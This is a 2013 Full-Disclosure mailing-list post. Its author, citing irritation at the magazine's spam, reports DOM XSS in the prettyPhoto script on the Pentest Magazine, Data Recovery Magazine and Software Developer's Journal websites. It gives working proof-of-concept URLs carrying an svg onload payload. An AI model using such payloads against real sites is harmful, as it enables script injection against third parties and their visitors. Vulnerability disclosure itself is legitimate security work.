Message-ID: <CAFLnUQOF=jCyYwjREP7pDJ5vz5uLEXZZqjg204cEa=BbESS4gQ@mail.gmail.com>
Date: Sun, 29 Sep 2013 21:40:13 +0800
From: Jay Turla <shipcodez@...il.com>
To: "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>
Subject: Pentest Mag, Data Recovery Magazine,
 and Software Developer's Journal Vulnerable to DOM XSS

I have been annoyed lately by the staffs of Pentest Magazine because of
their spam promotions and "Would you write for Us" inquiries despite saying
no to their proposals. I don't like to write for them because they don't
offer their services for free (Also they sell their magazines to other
people yet they don't pay their writers - no just compensation ). So here
is my full disclosure of Pentest Magazine, Data Recovery Magazine, and
Software Developer's Journal which are all from the same company or somehow
related. The official websites of the magazines mentioned are all
vulnerable to DOM XSS because of the prettyPhoto js.

PoC:
http://datarecoverymag.com/#!prettyPhoto/%3Csvg%20onload=%22prompt%28/jay%20was%20here/%29;%22%3E/

http://pentestmag.com/#!prettyPhoto/%3Csvg%20onload=%22prompt%28/jay%20was%20here/%29;%22%3E/

http://sdjournal.org/#!prettyPhoto/%3Csvg%20onload=%22prompt%28/jay%20was%20here/%29;%22%3E/

Attached are my screenshots.

P.S. No harmed was done!

Content of type "text/html" skipped

Download attachment "datarecovery.png" of type "image/png" (163745 bytes)

Download attachment "pentestmag.png" of type "image/png" (303809 bytes)

Download attachment "sdjournal.png" of type "image/png" (223467 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists